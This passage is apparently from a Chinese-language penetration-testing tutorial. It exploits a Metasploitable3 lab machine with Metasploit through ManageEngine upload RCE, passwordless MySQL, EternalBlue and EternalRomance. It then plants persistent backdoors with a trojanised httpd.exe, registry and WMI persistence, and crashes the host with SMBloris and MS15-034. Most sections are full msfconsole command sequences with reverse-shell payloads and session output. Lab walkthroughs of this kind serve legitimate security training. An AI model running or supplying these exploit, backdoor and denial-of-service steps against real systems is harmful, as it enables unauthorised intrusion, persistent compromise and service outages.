AgentLogUpload Arbitrary File Upload8   exploit/windows/http/desktopcentral_statusupdate_upload  2014-08-31       excellent  Yes    ManageEngine Desktop Central StatusUpdate Arbitrary File Upload9   exploit/windows/http/manage_engine_opmanager_rce         2015-09-14       manual     Yes    ManageEngine OpManager Remote Code Execution10  exploit/windows/http/manageengine_adshacluster_rce       2018-06-28       excellent  Yes    Manage Engine Exchange Reporter Plus Unauthenticated RCE11  exploit/windows/http/manageengine_appmanager_exec        2018-03-07       excellent  Yes    ManageEngine Applications Manager Remote Code Execution12  exploit/windows/http/manageengine_apps_mngr              2011-04-08       average    No     ManageEngine Applications Manager Authenticated Code Execution13  exploit/windows/http/manageengine_connectionid_write     2015-12-14       excellent  Yes    ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability14  exploit/windows/misc/manageengine_eventlog_analyzer_rce  2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Executionmsf5 exploit(multi/http/jenkins_script_console) >
msf5 exploit(multi/http/jenkins_script_console) > use exploit/windows/http/manageengine_connectionid_write
msf5 exploit(windows/http/manageengine_connectionid_write) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(windows/http/manageengine_connectionid_write) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit[-] Exploit failed: The following options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit[*] Started HTTP reverse handler on http://192.168.177.143:8080
[*] Creating JSP stager
[*] Uploading JSP stager uBzAP.jsp...
[*] Executing stager...
[*] http://192.168.177.143:8080 handling request from 192.168.177.144; (UUID: tsqgh8zb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (192.168.177.143:8080 -> 192.168.177.144:49632) at 2019-04-26 17:39:09 +0800
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/uBzAP.jsp' on the targetmeterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
# 5、利用公用服务

在漏洞攻击时,有些服务跟目标上其他大部分服务都有关系,而大多数是情况下它们被忽视了。

在本节中,我们将利用目标环境中最常见和最容易被滥用的服务-Mysql。大多数情况下,我们可以利用Mysql服务,因为它们是出于开发目的安装的。忽略了一些安全加固。比如设置root密码或者设置强密码。

我们将使用Metasploitable3 作为靶机

# 利用过程

要利用目标的Mysql服务,我们先使用MySQL枚举模块枚举目标,然后使用Oracle MySQL for the Microsoft Windows Payload攻击模块获取远程主机的shell

TIP:mysql_paylod模块在新版的Metasploit中被移除了。不过你可以从  https://www.exploit-db.com/download/16957下载这个模块,放到Metasploit对应的模块目录中(/usr/share/metasploit-framework/modules/exploits/windows/mysql),修改代码的前面几行为如下内容就行。

##                                                                        
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $                 
##                                                                        ##                                                                        
# This file is part of the Metasploit Framework and may be subject to     
# redistribution and commercial restrictions. Please see the Metasploit   
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/                                        
##                                                                        require 'msf/core'                                                        class MetasploitModule < Msf::Exploit::Remote                             Rank = ExcellentRanking                                           include Msf::Exploit::Remote::MYSQL                               include Msf::Exploit::CmdStager                                   

枚举:

msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Compiled for the following OS: Win64
[*] 192.168.177.144:3306 -      Architecture: x86
[*] 192.168.177.144:3306 -      Server Hostname: metasploitable3
[*] 192.168.177.144:3306 -      Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 -      Logging of queries and logins: OFF
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 -      Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 -      Allow Table Merge:
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[*] 192.168.177.144:3306 -      The following users have GRANT Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -      The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      Anonymous Accounts are Present:
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -      The following accounts have empty passwords:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts are not restricted by source:
[*] 192.168.177.144:3306 -              User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >

进行攻击:

msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

如果目标Mysql没有设置root密码,因此可以使用 MySQL服务上传shell并获得系统的远程访问权限。就像上面一样。所以,永远不要忘记对基础服务进行渗透测试。即便你认为不会有人傻到配置无密码的服务。

# 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏

再次利用在信息收集和扫描阶段收集的信息,特别是MS17-010 SMB RCE检测辅助模块的输出信息,我们可以继续利用下一个易受攻击的服务。

# 漏洞原理

MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption攻击模块是 Equation Group ETERNALBLUE的一部分。Equation Group ETERNALBLUEFuzzBunch toolkit 的一部分。由Shadow Brokrs从美国国家安全局(NSA)获取并公开。ETERNALBLUE通常被认为是由NSA开发。它利用srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝从而造成缓冲区溢出,进而允许我们执行任意命令。它在被公开后被用在`WannaCry`勒索软件中进行攻击。此漏洞会影响所有运行SMBv1服务且未更新SMB安全补丁的Windows计算机和Windows服务器。

# 利用过程

载入ms17_010_eternalblue模块,设置目标IP地址,设置Payload,然后执行攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.177.144:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter >
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
# 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 攻击模块也可用于MS17-0101漏洞利用。而且比EnternalBlue更可靠,不过需要命名管道。

# 利用过程

使用模块ms17_010_psexec

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
# 8、安装持久性后门

获取shell后,我们如果需要确保能持久性的访问目标系统,我们需要安装后门。

通过之前的漏洞利用,我们已经获得了与目标机的session,我们将利用meterpreter session来安装后门服务。这里以httpd.exe为例。

meterpreter > ps -S httpd.exe           
Filtering on 'httpd.exe'                                                       
Process List                                                                                                                                   
============                                                                                                                                  PID   PPID  Name               Arch  Session  User                        Path                                                                ---   ----  ----               ----  -------  ----                        ----                                                                1304  1816  dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  1816  472   dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  3180  472   httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe                       3880  3180  httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe       
meterpreter >                             

接下来,我们将利用windows注册表持久性模块安装随系统启动的后门。

最后我们将利用WMI( Windows Management Instrumentation )创建一个无文件后门。

# 利用过程

1、不能在程序运行的时候安装后门,所以先杀死进程

meterpreter > kill 3880
Killing: 3880
meterpreter >

2、将需要替换成后门的程序下载下来

meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >

3、将会话退回到后台,使用reverse_tcp攻击载荷,使用generate生成后门文件。

msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >

关于generate的参数说明,可以查看帮助信息

msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:-E        Force encoding-O <opt>  Deprecated: alias for the '-o' option-P <opt>  Total desired payload size, auto-produce approproate NOPsled length-S <opt>  The new section name to use when generating (large) Windows binaries-b <opt>  The list of characters to avoid example: '\x00\xff'-e <opt>  The encoder to use-f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war-h        Show this message-i <opt>  The number of times to encode the payload-k        Preserve the template behavior and inject the payload as a new thread-n <opt>  Prepend a nopsled of [length] size on to the payload-o <opt>  The output file name (otherwise stdout)-p <opt>  The platform of the payload-s <opt>  NOP sled length.-x <opt>  Specify a custom executable file to use as a template

4、启动一个监听,监听后门的反向连接,并使用expolit -j放到后台运行

msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >

5、切回之前的meterpreter session,上传后门文件并重命名。

msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading  : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded   : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >

6、使用shell命令进入目标系统的shell,重启wampapache服务。

meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.

你会发现,服务启动后,返回了新的会话

C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -lActive sessions
===============Id  Name  Type                     Information                                   Connection--  ----  ----                     -----------                                   ----------3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)4         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)5         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)msf5 exploit(multi/handler) >

7、使用Windows注册表持久化模块植入后门。我们利用永恒之蓝攻击获得的会话进行后门植入操作。

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
smsf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >

这里因为环境问题,并未植入成功。

8、如果成功,然后就可以设置监听,以便目标重启的时候获得反向shell会话

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >

9、当目标机器重启后,可以获得会话

meterpreter > reboot
Rebooting...

10、利用WMI事件订阅创建无文件后门

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 //设置回调时间为1分钟
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 //设置事件ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator //设置用户
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
smsf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit[-] This module cannot run as System

11、提示未成功,我们可以使用migratemeterpreter shell进程进行进程迁移,就是将meterpreter shell进程迁移到相对稳定应用的进程里。

msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...meterpreter > psProcess List
============PID   PPID  Name                           Arch  Session  User                          Path---   ----  ----                           ----  -------  ----                          ----0     0     [System Process]4     0     System                         x64   0232   4     smss.exe                       x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe300   472   svchost.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE316   304   csrss.exe                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe324   5624  explorer.exe                   x64   1        METASPLOITABLE3\vagrant       C:\Windows\Explorer.EXE.....
meterpreter > migrate -N explorer.exe //进程迁移不一定每次都能成功,可以多试几次
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >

然后再次攻击

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit[*] Installing Persistence...
[+]  - Bytes remaining: 12560
[+]  - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >

注销目标机登录,然后重新登录,msfconsole这边就会接收到回连的会话

[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
# 9、拒绝服务攻击

拒绝服务攻击通常是通过向目标机请求大量的资源或利用漏洞,造成拒绝服务攻击,消耗目标机器性能,拒绝服务攻击会导致合法用户无法访问计算机服务或资源,甚至可能会导致服务或操作系统崩溃。

# 漏洞原理

SMBloris是一个已经存在了 20 年的 Windows SMB 漏洞,此漏洞可导致拒绝服务攻击( DoS ) , 使得大规模服务器瘫痪。影响所有版本的 SMB 协议以及所有 Windows 2000 之后的系统版本。

# 利用过程

1、在进行SMBloris拒绝服务攻击之前,要先设置攻击机的最大连接数。

root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#

2、然后使用smb_loris模块来攻击目标机机器

msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open

3、查看目标机器,我们可以看到由于攻击者发送了大量的SMB请求消耗了目标机的大量内存。每一个 NBSS 连接可以申请分配 128 KB 内存空间,在建立大量连接的情况下可以耗尽内存,达到拒绝服务的效果。

另一个可怕的DoS攻击是MS15-034HTTP协议栈请求处理拒绝服务。

如果Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012机器正在运行了存在MS15-034漏洞的IIS服务,那么可以利用这个漏洞导致目标服务器崩溃。

msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >

可以看到,目标死机蓝屏了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/433875.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机视觉综述

大家好&#xff0c;今天&#xff0c;我们将一起探讨计算机视觉的基本概念、发展历程、关键技术以及未来趋势。计算机视觉是人工智能的一个重要分支&#xff0c;旨在使计算机能够“看”懂图像和视频&#xff0c;从而完成各种复杂的任务。无论你是对这个领域感兴趣的新手&#xf…

HarmonyOS故障恢复实践

一、应用恢复框架 异常感知机制&#xff0c;实时通知应用&#xff1b; 统一保存和恢复机制&#xff0c;降低门槛&#xff1b; 重启恢复&#xff0c;保证恢复结果。 二、API全集 三、应用异常恢复实例 全面的异常检测机制&#xff0c;开放完善ability数据保存接口。当应用异常时…

Java并发:互斥锁,读写锁,公平锁,Condition,StampedLock

